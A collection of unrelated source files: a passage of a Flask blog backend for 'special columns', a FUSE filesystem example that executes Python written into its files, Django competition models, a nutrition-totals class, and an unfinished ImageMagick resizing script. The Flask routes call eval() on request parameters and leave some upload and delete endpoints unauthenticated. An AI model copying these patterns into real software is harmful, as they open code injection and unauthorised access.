root_authorized = root_authorized(),
#author_itself = (special.user_id == login_user),
has_collected_special = get_special_collect_info(login_user, special_id),
has_collected_author = has_collected,
sort_change_url = sort_change_url,
special_id = special_id,
sort = sort,
special_favor = special.favor,
special_title = special.name,
special_author = author,
#special_author_slogon = author.slogon,
special_introduction = special.introduction,
special_style = special.style,
special_total_issue = special.total_issue,
special_update_frequency = special.update_frequency,
special_coin = special.coin,
special_image = special.picture,
#special_author_avatar = author.photo,
articles_pagination = articles_pagination,
get_nick_by_userid = get_nick_by_userid)
else:
return render_template('special_detail.html',
len = len,
author = get_special_author,
login_user_id = login_user,
is_mobile = is_mobile,
root_authorized = root_authorized(),
#author_itself = (special.user_id == login_user),
has_collected_special = get_special_collect_info(login_user, special_id),
has_collected_author = has_collected,
sort_change_url = sort_change_url,
special_id = special_id,
sort = sort,
other = get_special_author_other,
special_favor = special.favor,
special_title = special.name,
special_author = author,
#special_author_slogon = author.slogon,
special_introduction = special.introduction,
special_style = special.style,
special_total_issue = special.total_issue,
special_update_frequency = special.update_frequency,
special_coin = special.coin,
special_image = special.picture,
#special_author_avatar = author.photo,
articles_pagination = articles_pagination,
related_other_special = related_other_special,
get_nick_by_userid = get_nick_by_userid)
## Special column creation page
@app.route('/create_special')
@login_required
def create_special():
if (not root_authorized()):
abort(404)
return render_template('create_special.html')
## Special column modification page
@app.route('/modify_special')
@login_required
def modify_special():
if (not root_authorized()):
abort(404)
return render_template('modify_special.html')
## Upload the special column title image
@app.route('/upload_special_title_image', methods=['GET', 'POST'])
def save_special_title_image():
title_image = request.files['upload_file']
#Set the default title image
title_image_name = 'special_upload_pic.jpg'
if title_image:
if allowed_file(title_image.filename):
title_image_name=get_secure_photoname(title_image.filename)
title_image_url=os.path.join(app.config['SPECIAL_DEST'], title_image_name)
title_image.save(title_image_url)
return app.config['HOST_NAME']+'/upload/special/'+title_image_name
# Open Meitu Xiuxiu (web image editor) for tailoring the title image
@app.route('/upload/tailor/special_title_image')
def upload_special_title_image():
return render_template('upload_special_title_image_tailor.html')
## Finish uploading a newly created special column
@app.route('/create_special_finish', methods=['GET'])
@login_required
def create_special_finish():
if (not root_authorized()):
abort(404)
try:
title = request.args.get('title')
content = request.args.get('content')
title_image = request.args.get('title_image')
style = request.args.get('style')
total_issue = request.args.get('total_issue')
update_frequency = request.args.get('update_frequency')
except Exception:
return "failed"
authors = []
try:
author_list = eval(request.args.get('author_list'))
for nick in author_list:
author = get_userid_by_nick(nick)
if (len(author) == 0):
return "nick_error"
authors.append(author[0][0])
except Exception:
return "failed"
special_id = create_new_special(name = title,
#user_id = author[0][0],
picture = title_image,
introduction = content,
style = style,
total_issue = total_issue,
update_frequency = update_frequency)
for author in authors:
create_new_special_author(special_id, author)
return str(special_id)
## Finish modifying a special column
@app.route('/modify_special_finish', methods=['GET'])
@login_required
def modify_special_finish():
if (not root_authorized()):
abort(404)
try:
title = request.args.get('title')
content = request.args.get('content')
title_image = request.args.get('title_image')
style = request.args.get('style')
total_issue = request.args.get('total_issue')
update_frequency = request.args.get('update_frequency')
except Exception:
return "failed"
authors = []
try:
author_list = eval(request.args.get('author_list'))
for nick in author_list:
author = get_userid_by_nick(nick)
if (len(author) == 0):
return "nick_error"
authors.append(author[0][0])
except Exception:
return "failed"
try:
special_id = modify_special_func(name = title,
#user_id = author[0][0],
authors = authors,
picture = title_image,
introduction = content,
style = style,
total_issue = total_issue,
update_frequency = update_frequency)
return str(special_id)
except Exception:
return "failed"
## Edit a special column article
@app.route('/special_article_upload', methods=['GET'])
@login_required
def special_article_upload():
try:
special_id = int(request.args.get('id'))
except Exception:
abort(404)
####TODO
#author = get_special_information(special_id).user_id
#login_user = get_userid_from_session()
if (not root_authorized()):
abort(404)
article_session_id = get_article_session_id()
session['special_article_session_id'] = str(article_session_id)
session['special_id'] = str(special_id)
os.makedirs(os.path.join(app.config['ARTICLE_CONTENT_DEST'], str(article_session_id)))
return render_template('special_article_upload.html')
# Modify a special column article
@app.route('/special_article_modify/article/<int:article_id>')
@login_required
def special_article_modify(article_id):
article = get_article_information(article_id)
try:
special_id = int(article[0].special_id)
except Exception:
abort(404)
if (not root_authorized()):
abort(404)
session['special_id'] = str(article[0].special_id)
session['special_article_session_id'] = str(article[0].article_session_id)
return render_template('special_article_modify.html',
article=article[0], book=article[2],
get_author = get_nick_by_userid)
# Delete a special column article
@app.route('/special_article_remove', methods=['GET'])
def special_article_remove():
try:
article_id = request.args.get('id')
except Exception:
return "failed"
user_id = get_userid_from_session()
if delete_article_by_article_id(article_id, user_id) == 'fail':
return "failed"
return "success"
## Upload a special column article
##TODO: the submission may come from a draft already stored in the database;
##      in that case only the is_draft field needs to be updated
@app.route('/special_article_finish', methods=['POST'])
def special_article_finish():
content = request.form['content']
title = request.form['title']
##TODO: sanitize the article title for safety
title_image=request.form['title_image']
abstract_abstract_with_img=request.form['abstract']
book_picture=request.form['book_picture']
book_author=request.form['book_author']
book_press=request.form['book_press']
book_page_num=request.form['book_page_num']
book_price=request.form['book_price']
book_press_time=request.form['book_press_time']
book_title=request.form['book_title']
book_ISBN=request.form['book_ISBN']
book_binding=request.form['book_binding']
special_author = request.form['special_author']
try:
user_id = get_userid_by_nick(special_author)[0][0]
if not has_special_author(int(session['special_id']), user_id):
raise Exception
except Exception:
return "nick"
abstract_plain_text=get_abstract_plain_text(abstract_abstract_with_img)
if len(abstract_plain_text)<191:
abstract=abstract_plain_text[0:len(abstract_plain_text)-1]+'......'
else:
abstract=abstract_plain_text[0:190]+'......'
book_id = create_book(book_picture = book_picture,
book_author = book_author,
book_press = book_press,
book_page_num = book_page_num,
book_price = book_price,
book_press_time = book_press_time,
book_title = book_title,
book_ISBN = book_ISBN,
book_binding = book_binding)
article_id=create_article(title = title, content = content,
title_image = title_image, user_id = user_id,
article_session_id = session['special_article_session_id'],
is_draft ='0', special_id = int(session['special_id']),
group_id = '3', category_id = '0',
abstract = abstract,
book_id = book_id)
update_article_num_for_special(int(session['special_id']),True)
session.pop('special_id', None)
session.pop('special_article_session_id', None)
return str(article_id)
# Upload a special column draft
@app.route('/special_article_draft',methods=['POST'])
def special_article_draft():
content=request.form['content']
##TODO: sanitize the article title for safety
title=request.form['title']
title_image=request.form['title_image']
abstract_abstract_with_img=request.form['abstract']
book_picture=request.form['book_picture']
book_author=request.form['book_author']
book_press=request.form['book_press']
book_page_num=request.form['book_page_num']
book_price=request.form['book_price']
book_press_time=request.form['book_press_time']
book_title=request.form['book_title']
book_ISBN=request.form['book_ISBN']
book_binding=request.form['book_binding']
special_author = request.form['special_author']
try:
user_id = get_userid_by_nick(special_author)[0][0]
if not has_special_author(int(session['special_id']), user_id):
raise Exception
except Exception:
return "nick"
abstract_plain_text=get_abstract_plain_text(abstract_abstract_with_img)
if len(abstract_plain_text)<191:
abstract=abstract_plain_text[0:len(abstract_plain_text)-1]+'......'
else:
abstract=abstract_plain_text[0:190]+'......'
#create_article(title=title,content=content,title_image=title_image,user_id=user_id,article_session_id=session['article_session_id'],is_draft='1',group_id=group_id,category_id=category_id,abstract=abstract)
book_id=create_book(book_picture=book_picture,book_author=book_author,book_press=book_press,book_page_num=book_page_num,book_price=book_price,book_press_time=book_press_time,book_title=book_title,book_ISBN=book_ISBN,book_binding=book_binding)
article_id=create_article(title = title, content = content,
title_image = title_image, user_id = user_id,
article_session_id = session['special_article_session_id'],
is_draft ='1', special_id = int(session['special_id']),
group_id = '3', category_id = '0',
abstract = abstract,
book_id = book_id)
return str(article_id)
################################## Special column detail pages ##################################
@app.route('/upload/special/<filename>')
def uploaded_special_image(filename):
return send_from_directory(app.config['SPECIAL_DEST'],filename)
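# --- Editor's sketch (not in the original module): a minimal smoke test of the
# list route using Flask's test client. It assumes `app`, imported above via
# `from imports import *`, is the Flask application and that a database backing
# the get_*_specials helpers is available; the query values are invented.
def _smoke_test_special_all():
    with app.test_client() as client:
        resp = client.get('/special_all?view=list&sort=time&page=1')
        return resp.status_code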
| repo: Roger/defuse | path: examples/evalfs.py | copies: 1 | size: 2562 | license: bsd-3-clause |

import sys
import traceback
from stat import S_IRUSR, S_IXUSR, S_IWUSR, S_IRGRP, S_IXGRP, S_IXOTH, S_IROTH
from errno import ENOENT
import fuse
from fs import FS, BaseMetadata
fs = FS.get()
class Out(object):
def __init__(self):
self.out = ''
def write(self, data):
self.out += data
def read(self):
return self.out
def evalcode(code):
old_stdout = sys.stdout
try:
new_stdout = Out()
sys.stdout = new_stdout
eval(compile(code, "<eval>", "exec"))
return new_stdout.read()
except:
error = traceback.format_exc().strip().split("\n")[-1]
return error
finally:
sys.stdout = old_stdout
@fs.route('/eval')
@fs.route('/eval/<filepath>.py')
class Eval(object):
def __init__(self):
file_mode = S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH
self.file_metadata = BaseMetadata(file_mode, False)
root_mode = S_IRUSR|S_IXUSR|S_IWUSR|S_IRGRP|S_IXGRP|S_IXOTH|S_IROTH
self.dir_metadata = BaseMetadata(root_mode, True)
self.files = {}
def create(self, *args, **kwargs):
self.files[kwargs['filepath']] = ''
return 0
def open(self, flags, **kwargs):
return 0
def getattr(self, *args, **kwargs):
if 'filepath' in kwargs:
data = kwargs['filepath']
if data not in self.files:
return -ENOENT
data = evalcode(self.files[data])
self.file_metadata.st_size = len(data)
return self.file_metadata
return self.dir_metadata
def readdir(self, *args, **kwargs):
for i in self.files:
yield fuse.Direntry('%s.py' % i)
def read(self, size, offset, *args, **kwargs):
key = kwargs['filepath']
data = evalcode(self.files[key])
return data[offset:size+offset]
def write(self, buf, offset, fh=None, **kwargs):
key = kwargs['filepath']
prev_data = self.files[key]
new_data = prev_data[:offset] + buf + prev_data[offset+len(buf):]
if offset + len(new_data) > len(prev_data):
self.truncate(offset + len(new_data), filepath=key)
self.files[key] = new_data
return len(buf)
def truncate(self, size, fh=None, **kwargs):
key = kwargs['filepath']
prev_data = self.files[key]
prev_size = len(prev_data)
if size > prev_size:
new_data = prev_data + (size - prev_size)*"0"
else:
new_data = prev_data[0:size]
self.files[key] = new_data
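# --- Editor's sketch (not in the original example): the write/read cycle can be
# simulated without mounting FUSE, assuming the fs.route decorator returns the
# class unchanged; the file name and code snippet below are invented.
def _demo_eval_cycle():
    fs_file = Eval()
    fs_file.create(filepath='hello')
    fs_file.write("print('hi')", 0, filepath='hello')
    return fs_file.read(4096, 0, filepath='hello')  # evaluates the code -> "hi\n"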
| repo: matus-stehlik/glowing-batman | path: competitions/models.py | copies: 1 | size: 5313 | license: mit |

from django.contrib.auth.models import Group
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.timezone import now
from base.util import with_timestamp, with_author, remove_accents
# Competition-related models
@with_author
@with_timestamp
class Competition(models.Model):
"""
Represents a competition. One roots site will usually hold several
competitions, as there are usually several age categories or several
subjects categories. Or both.
"""
name = models.CharField(max_length=100)
organizer_group = models.ForeignKey(Group, blank=True, null=True)
# Fields added via foreign keys:
# competitionorgregistration_set
# competitionuserregistration_set
# gallery_set
# leaflet_set
# post_set
# problemset_set
# season_set
# user_set
def __unicode__(self):
return self.name
class Meta:
ordering = ['name']
verbose_name = 'Competition'
verbose_name_plural = 'Competitions'
@with_author
@with_timestamp
class CompetitionUserRegistration(models.Model):
"""
Represents a relation between a user and a competition. Users can
register for a competition themselves if they satisfy the conditions.
"""
competition = models.ForeignKey('competitions.Competition')
user = models.ForeignKey('profiles.UserProfile')
def __unicode__(self):
return (self.user.__unicode__() + u" competes in " +
self.competition.__unicode__())
class Meta:
ordering = ['added_at']
verbose_name = 'User registration'
verbose_name_plural = 'User registrations'
@with_author
@with_timestamp
class CompetitionOrgRegistration(models.Model):
"""
Represents a relation between an organizer and a competition. An organizer can
help organize multiple competitions. Organizer registrations have to
be approved.
"""
competition = models.ForeignKey('competitions.Competition')
organizer = models.ForeignKey('profiles.UserProfile')
approved = models.BooleanField()
def __unicode__(self):
return (self.organizer.__unicode__() + u" organizes " +
self.competition.__unicode__())
class Meta:
ordering = ['added_at']
verbose_name = 'Organizer registration'
verbose_name_plural = 'Organizer registrations'
@with_author
@with_timestamp
class Season(models.Model):
"""
Represents an one season of a competition. This is usually autumn or spring
season. Using this model, however, we are not limited to 2 seasons per year.
During each Season there might be several ProblemSets published as parts
of that season.
"""
competition = models.ForeignKey('competitions.Competition')
year = models.IntegerField()
number = models.IntegerField()
name = models.CharField(max_length=50)
join_deadline = models.DateTimeField(blank=True, null=True)
def __unicode__(self):
template = "{name} ({competition} {year}-{number})"
return template.format(competition=remove_accents(self.competition),
year=self.year,
number=self.number,
name=remove_accents(self.name),
)
class Meta:
ordering = ['competition', 'year', 'number']
verbose_name = 'Season'
verbose_name_plural = 'Seasons'
@with_author
@with_timestamp
class Series(models.Model):
"""
Represents one series of problems in the season of the competetion.
"""
season = models.ForeignKey('competitions.Season')
name = models.CharField(max_length=50)
number = models.PositiveSmallIntegerField()
problemset = models.OneToOneField('problems.ProblemSet', blank=True,
null=True)
submission_deadline = models.DateTimeField()
is_active = models.BooleanField(default=False)
def is_past_submission_deadline(self):
return now() > self.submission_deadline
def is_nearest_deadline(self):
# Series are returned sorted by the submission deadline
active_series = [s for s in Series.objects.all()
if not s.is_past_submission_deadline()]
if active_series:
return active_series[0] == self
else:
return False
def clean(self, *args, **kwargs):
if self.is_active:
if not self.submission_deadline:
raise ValidationError("Submission deadline must be set to "
"make the series active")
if not self.problemset:
raise ValidationError("Corresponding set of problems must be "
"set to make the series active")
if self.is_past_submission_deadline():
raise ValidationError("Series that is past its submission "
"deadline cannot be made active")
super(Series, self).clean()  # fixed: clean() should run validation only, not call save()
def __unicode__(self):
return self.name
class Meta:
ordering = ['submission_deadline']
unique_together = ('season', 'number')
verbose_name = 'Series'
verbose_name_plural = 'Series'
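# --- Editor's sketch (not in the original module): an illustrative query built
# on the helpers above; it assumes Django is configured and migrations applied.
def upcoming_series():
    """Series whose submission deadline has not passed, nearest first."""
    return [s for s in Series.objects.all()
            if not s.is_past_submission_deadline()]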
| repo: Thierry46/CalcAl | path: model/TotalLine.py | copies: 1 | size: 6973 | license: gpl-3.0 |

# -*- coding: utf-8 -*-
"""
************************************************************************************
Class : TotalLine
Author : Thierry Maillard (TMD)
Date : 28/10/2016 - 18/11/2016
Role : Define a TotalLine for food table.
Licence : GPLv3
Copyright (c) 2016 - Thierry Maillard
This file is part of CalcAl project.
CalcAl project is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CalcAl project is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CalcAl project. If not, see <http://www.gnu.org/licenses/>.
Modif. :
- dictComponentsValueStr is calculated when calling getFormattedValue()
- getFormattedValue accepts 1 parameter : nbDays
************************************************************************************
"""
from model import ModelBaseData
from model import Component
from util import CalcalExceptions
class TotalLine(ModelBaseData.ModelBaseData):
""" Model for a TotalLine """
def __init__(self, configApp):
super(TotalLine, self).__init__(configApp, None, "TotalLine")
self.setData("containValues", False)
self.setData("name", _("Total"))
self.setData("quantity", 0.0)
self.setData("dictComponentsQualifierQuantity", dict())
# table for qualification reduction rules
self.qRulesS = self.configApp.get('QualifValue', 'QRulesS').split(";")
self.qRules0 = self.configApp.get('QualifValue', 'QRules0').split(";")
self.qRulesO = self.configApp.get('QualifValue', 'QRulesO').split(";")
self.logger.debug("Created in model" + str(self))
def update(self, dictFoodStuff):
""" Update total line value according value in parent """
# Get values of all foodstuff in model
nbFoodStuff = len(dictFoodStuff)
if nbFoodStuff > 0:
# Sum quantities of each food
self.setData("quantity", 0.0)
for foodStuff in dictFoodStuff.values():
self.setData("quantity", self.getData("quantity") + foodStuff.getData("quantity"))
# Sum all components values and qualifiers
dictQualifierQuantity = dict()
for foodStuff in dictFoodStuff.values():
for codeComponent, component in foodStuff.dictComponents.items():
qualifValue = component.getData("qualifValue")
quantity = component.getData("quantity")
if codeComponent in dictQualifierQuantity.keys():
dictQualifierQuantity[codeComponent][0] += qualifValue
dictQualifierQuantity[codeComponent][1] += quantity
else:
dictQualifierQuantity[codeComponent] = [qualifValue, quantity]
# Reduce qualifiers and format all components
self.getData("dictComponentsQualifierQuantity").clear()
for codeComponent, qualifierQuantity in dictQualifierQuantity.items():
qualifierQuantity[0] = self.reducQualifier(qualifierQuantity[0],
qualifierQuantity[1])
self.getData("dictComponentsQualifierQuantity")[codeComponent] = \
[qualifierQuantity[0],
qualifierQuantity[1]]
def reducQualifier(self, qualif2Reduce, value):
""" Reduce qualif2Reduce expression by applying rules read in config file """
qualifResult = "".join(set(qualif2Reduce))
nbReduction = 0
while nbReduction < 5 and len(qualifResult) > 1:
# Apply rules
if value >= float(self.configApp.get("Limits", "near0")):
qRule2apply = self.qRulesS
else: # For value near 0
qRule2apply = self.qRules0
qRule2apply = qRule2apply + self.qRulesO
for rule in qRule2apply:
if rule[0] in qualifResult and rule[1] in qualifResult:
qualifResult = qualifResult.replace(rule[0], rule[2])
qualifResult = qualifResult.replace(rule[1], rule[2])
qualifResult = "".join(set(qualifResult))
nbReduction = nbReduction + 1
if nbReduction >= 5:
raise CalcalExceptions.CalcalInternalError(self.configApp,
"reducQualifier don't converge : " +
qualif2Reduce +
" can't be reduce : " + qualifResult +
". Check config/[QualifValue]/QRules")
return qualifResult
def getFormattedValue(self, nbDays=1):
""" Return name, quantity and dict(codeComponents) = qty formated
for all components of this total line
V0.38 : build dictComponentsValueStr
getFormattedValue accept 1 optional parameter : Nb days
Parameter nbDays : all returned values are divided by this integer """
assert nbDays > 0, "TotalLine/getFormattedValue() : nbDays must be > 0 " + str(nbDays)
dictComponentsValueStr = dict()
for codeComponent, qualifierQuantity \
in self.getData("dictComponentsQualifierQuantity").items():
dictComponentsValueStr[codeComponent] = \
Component.Component.getValueFormatedStatic(self.configApp,
qualifierQuantity[0],
qualifierQuantity[1] / float(nbDays))
totalName = self.getData("name")
totalQuantity = self.getData("quantity")
if nbDays > 1:
totalName += " " + _("per day")
totalQuantity /= float(nbDays)
return totalName, round(totalQuantity, 1), dictComponentsValueStr
def getRawValue(self):
""" Return name, quantity and dict(codeComponents) = [Qualifier, quantity]
for all components of this total line """
return self.getData("name"), self.getData("quantity"), \
self.getData("dictComponentsQualifierQuantity")
def normalise4for100g(self):
""" Normalise all components quantities for 100g of products """
ratio = 100. / self.getData("quantity")
for fieldsComponent in self.getData("dictComponentsQualifierQuantity").values():
fieldsComponent[1] *= ratio
self.setData("quantity", 100.)
| repo: relic7/prodimages | path: python/magicColorspaceModAspctLoadFaster.py | copies: 1 | size: 21256 |

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, sys, re, csv
def copy_to_imagedrop_upload(src_filepath, destdir=None):
import pycurl, os, shutil, re
regex_colorstyle = re.compile(r'^.*?/[0-9]{9}[_altm0-6]{,6}?\.[jpngJPNG]{3}$')
if not regex_colorstyle.findall(src_filepath):
print src_filepath.split('/')[-1], ' Is Not a valid Bluefly Colorstyle File or Alt Out of Range'
return
else:
if not destdir:
destdir = '/mnt/Post_Complete/ImageDrop'
imagedrop = os.path.abspath(destdir)
localFileName = src_filepath.split('/')[-1]
imagedropFilePath = os.path.join(imagedrop, localFileName.lower())
try:
if os.path.isfile(imagedropFilePath):
try:
os.remove(imagedropFilePath)
#os.rename(src_filepath, imagedropFilePath)
shutil.copyfile(src_filepath, imagedropFilePath)
return True
except:
print 'Error ', imagedropFilePath
return False
#shutil.copyfile(src_filepath, imagedropFilePath
else:
##os.rename(src_filepath, imagedropFilePath)
shutil.copyfile(src_filepath, imagedropFilePath)
return True
except:
return False
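# Hedged usage sketch (paths below are made up): the colorstyle regex accepts
# a 9-digit style name with an optional suffix drawn from [_altm0-6] (e.g.
# _1, _alt01, _m) and a 3-letter jpg/png extension.
#
#   copy_to_imagedrop_upload('/tmp/123456789.jpg')        # valid colorstyle
#   copy_to_imagedrop_upload('/tmp/123456789_alt01.png')  # valid alt image
#   copy_to_imagedrop_upload('/tmp/readme.txt')           # rejected, returns None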
def rename_retouched_file(img):
import os,re
regex_coded = re.compile(r'.+?/[1-9][0-9]{8}_[1-6]\.[jJpPnNgG]{3}')
imgfilepath = img
if re.findall(regex_coded,imgfilepath):
filedir = imgfilepath.split('/')[:-1]
filedir = '/'.join(filedir)
print filedir
filename = imgfilepath.split('/')[-1]
colorstyle = str(filename[:9])
testimg = filename.split('_')[-1]
alttest = testimg.split('.')[0]
ext = filename.split('.')[-1]
ext = ".{}".format(ext.lower())
        if alttest.isdigit() and len(alttest) == 1:
if alttest == '1':
src_img_primary = img.replace('_1.','.')
os.rename(img, src_img_primary)
return src_img_primary
else:
alttest = int(alttest)
print alttest
alttest = alttest - 1
alt = '_alt0{}'.format(str(alttest))
print alt
if alt:
filename = "{}{}{}".format(colorstyle,alt,ext)
renamed = os.path.join(filedir, filename)
print renamed
if renamed:
os.rename(img, renamed)
if os.path.isfile(renamed):
return renamed
else:
return img
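# Illustrative rename mapping (hypothetical paths): a trailing _1 marks the
# primary image, while _2.._6 become zero-padded alt suffixes shifted down
# by one.
#
#   rename_retouched_file('/a/123456789_1.jpg')  # -> '/a/123456789.jpg'
#   rename_retouched_file('/a/123456789_3.jpg')  # -> '/a/123456789_alt02.jpg'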
def get_aspect_ratio(img):
from PIL import Image
try:
im = Image.open(img)
w,h = im.size
aspect_ratio = str(round(float(int(h))/float(int(w)),2))
return aspect_ratio
except IOError:
pass
def get_dimensions(img):
from PIL import Image
try:
im = Image.open(img)
w,h = im.size
dimensions = "{0}x{1}".format(int(w),int(h))
return dimensions
except IOError:
pass
def get_exif_metadata_value(img, exiftag=None):
import pyexiv2
image_metadata = pyexiv2.ImageMetadata(img)
metadata = image_metadata.read()
if exiftag:
exifvalue = metadata[exiftag]
return (exiftag, exifvalue)
else:
metadict = {}
for mtag, mvalue in metadata.iteritems():
metadict[mtag] = mvalue
return metadict
def get_image_color_minmax(img):
import subprocess, os, sys, re
try:
ret = subprocess.check_output(['convert', img, '-median', '3', '+dither', '-colors', '2', '-trim', '+repage', '-gravity', 'center', '-crop', "50%", '-depth', '8', '-format', '%c',"histogram:info:-"])
except:
return ''
colorlow = str(ret).split('\n')[0].strip(' ')
colorlow = re.sub(re.compile(r',\W'),',',colorlow).replace(':','',1).replace('(','').replace(')','').replace(' ',' ').split(' ')
colorhigh = str(ret).split('\n')[1].strip(' ')
colorhigh = re.sub(re.compile(r',\W'),',',colorhigh).replace(':','',1).replace('(','').replace(')','').replace(' ',' ').split(' ')
fields_top = ['low_rgb_avg', 'high_rgb_avg']
fields_level2 = ['total_pixels', 'rgb_vals', 'webcolor_id', 'color_profile_vals']
colorlow = zip(fields_level2,colorlow)
colorhigh = zip(fields_level2,colorhigh)
if len(colorhigh) == len(colorlow):
coloravgs = dict(colorlow),dict(colorhigh)
colordata = zip(fields_top, coloravgs)
colordata = dict(colordata)
colordata['comp_level'] = 'InRange'
return colordata
elif len(colorhigh) < len(colorlow):
coloravgs = dict(colorlow)
colordata = {}
colordata[fields_top[0]] = coloravgs
colordata[fields_top[1]] = {'total_pixels': 0}
colordata['comp_level'] = 'Bright'
return colordata
elif len(colorhigh) > len(colorlow):
coloravgs = dict(colorhigh)
colordata = {}
colordata[fields_top[1]] = coloravgs
        colordata[fields_top[0]] = {'total_pixels': 0}
colordata['comp_level'] = 'Dark'
return colordata
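# A minimal sketch of what is parsed above (numbers are made up): ImageMagick's
# "histogram:info:-" emits one line per remaining color, e.g.
#
#   '   1234: ( 12, 34, 56) #0C2238 srgb(12,34,56)'
#
# and the regex/replace cleanup splits that into the four fields_level2
# values: total_pixels, rgb_vals, webcolor_id and color_profile_vals.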
def evaluate_color_values(colordata):
high_range_pixels = ''
low_range_pixels = ''
high_range_pixels = float((colordata['high_rgb_avg']['total_pixels']))
low_range_pixels = float((colordata['low_rgb_avg']['total_pixels']))
try:
if low_range_pixels >= high_range_pixels and high_range_pixels != 0:
r,g,b = colordata['high_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
high_avg = float(round((r+b+g)/3,2))
r,g,b = colordata['low_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
low_avg = float(round((r+b+g)/3,2))
ratio = round(float(float(low_range_pixels)/float(high_range_pixels)),2)
print high_avg/(low_avg*ratio)
return high_avg,low_avg,ratio, 'LOW'
elif low_range_pixels < high_range_pixels and low_range_pixels != 0:
r,g,b = colordata['high_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
high_avg = float(round((r+b+g)/3,2))
r,g,b = colordata['low_rgb_avg']['rgb_vals'].split(',')
r,g,b = float(r),float(g),float(b)
low_avg = float(round((r+b+g)/3,2))
ratio = round(float(float(low_range_pixels)/float(high_range_pixels)),2)
print low_avg/(high_avg*ratio)
return high_avg,low_avg,ratio, 'HIGH'
except TypeError:
print "Type Error"
pass
except ValueError:
print "Value Error", colordata
pass
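# Shape of the return value (numbers are illustrative): for an image whose
# dark half dominates, evaluate_color_values(colordata) yields roughly
#
#   (231.4, 52.7, 3.85, 'LOW')   # high_avg, low_avg, pixel ratio, range flag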
def sort_files_by_values(directory):
import os,glob
filevalue_dict = {}
fileslist = directory
count = len(fileslist)
for f in fileslist:
values = {}
colordata = get_image_color_minmax(f)
try:
high,low,ratio, ratio_range = evaluate_color_values(colordata)
values['ratio'] = ratio
values['ratio_range'] = ratio_range
if ratio_range == 'LOW':
values['low'] = low ##
values['high'] = high
if ratio_range == 'HIGH':
values['high'] = high ##
values['low'] = low
filevalue_dict[f] = values
count -= 1
print "{0} Files Remaining".format(count)
except TypeError:
filevalue_dict[f] = {'ratio_range': 'OutOfRange'}
count -= 1
print "{0} Files Remaining-TypeError".format(count)
pass
except ZeroDivisionError:
filevalue_dict[f] = {'ratio_range': 'OutOfRange'}
count -= 1
print "{0} Files Remaining-ZeroDivision".format(count)
pass
return filevalue_dict
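# Shape of the mapping returned above (filenames and numbers are made up):
#
#   {'/in/123456789.jpg': {'ratio': 1.4, 'ratio_range': 'LOW',
#                          'low': 40.1, 'high': 210.3},
#    '/in/987654321.jpg': {'ratio_range': 'OutOfRange'}}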
def subproc_magick_large_jpg(img, destdir=None):
import subprocess,os,re
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
os.chdir(os.path.dirname(img))
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
if not regex_alt.findall(img):
outfile = os.path.join(destdir, img.split('/')[-1][:9] + '_l.jpg')
dimensions = ''
aspect_ratio = get_aspect_ratio(img)
dimensions = get_dimensions(img)
width = dimensions.split('x')[0]
height = dimensions.split('x')[1]
if aspect_ratio == '1.2':
vert_horiz = '400x480'
elif float(aspect_ratio) > float(1.2):
vert_horiz = 'x480'
elif float(aspect_ratio) < float(1.2):
vert_horiz = '400x'
dimensions = "400x480"
print dimensions,vert_horiz
if regex_valid_style.findall(img):
subprocess.call([
'convert',
'-colorspace',
'sRGB',
img,
'-background',
'white',
"-filter",
"Spline",
"-filter",
"Cosine",
"-define",
"filter:blur=0.9891028367558475",
"-distort",
"Resize",
vert_horiz,
'-extent',
dimensions,
"-colorspace",
"sRGB",
"-format",
"jpeg",
'-unsharp',
'2x1.24+0.5+0',
'-quality',
'95',
outfile
])
return outfile
else:
return img
else:
pass
def subproc_magick_medium_jpg(img, destdir=None):
import subprocess,os,re
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
os.chdir(os.path.dirname(img))
if not destdir:
destdir = os.path.abspath('.')
else:
destdir = os.path.abspath(destdir)
if regex_alt.findall(img):
outfile = os.path.join(destdir, img.split('/')[-1].split('.')[0] + '.jpg')
else:
outfile = os.path.join(destdir, img.split('/')[-1][:9] + '_m.jpg')
dimensions = ''
aspect_ratio = get_aspect_ratio(img)
dimensions = get_dimensions(img)
width = dimensions.split('x')[0]
height = dimensions.split('x')[1]
if aspect_ratio == '1.2':
vert_horiz = '200x240'
elif float(aspect_ratio) > float(1.2):
vert_horiz = 'x240'
elif float(aspect_ratio) < float(1.2):
vert_horiz = '200x'
dimensions = '200x240'
print dimensions,vert_horiz
if regex_valid_style.findall(img):
subprocess.call([
'convert',
'-colorspace',
'sRGB',
img,
'-background',
'white',
"-filter",
"Spline",
"-filter",
"Cosine",
"-define",
"fliter:blur=0.9891028367558475",
"-distort",
"Resize",
vert_horiz,
'-extent',
dimensions,
"-colorspace",
"sRGB",
"-format",
"jpeg",
'-unsharp',
'2x1.1+0.5+0',
'-quality',
'95',
outfile
])
return outfile
else:
return img
def subproc_magick_png(img, rgbmean=None, destdir=None):
import subprocess,re,os
regex_coded = re.compile(r'^.+?/[1-9][0-9]{8}_[1-6]\.jpg$')
regex_alt = re.compile(r'^.+?/[1-9][0-9]{8}_\w+?0[1-6]\.[JjPpNnGg]{3}$')
regex_valid_style = re.compile(r'^.+?/[1-9][0-9]{8}_?.*?\.[JjPpNnGg]{3}$')
modulator = ''
modulate = ''
if not destdir:
destdir = '.'
#imgdestpng_out = os.path.join(tmp_processing, os.path.basename(imgsrc_jpg))
os.chdir(os.path.dirname(img))
if not rgbmean:
ratio_range = 'OutOfRange'
else:
try:
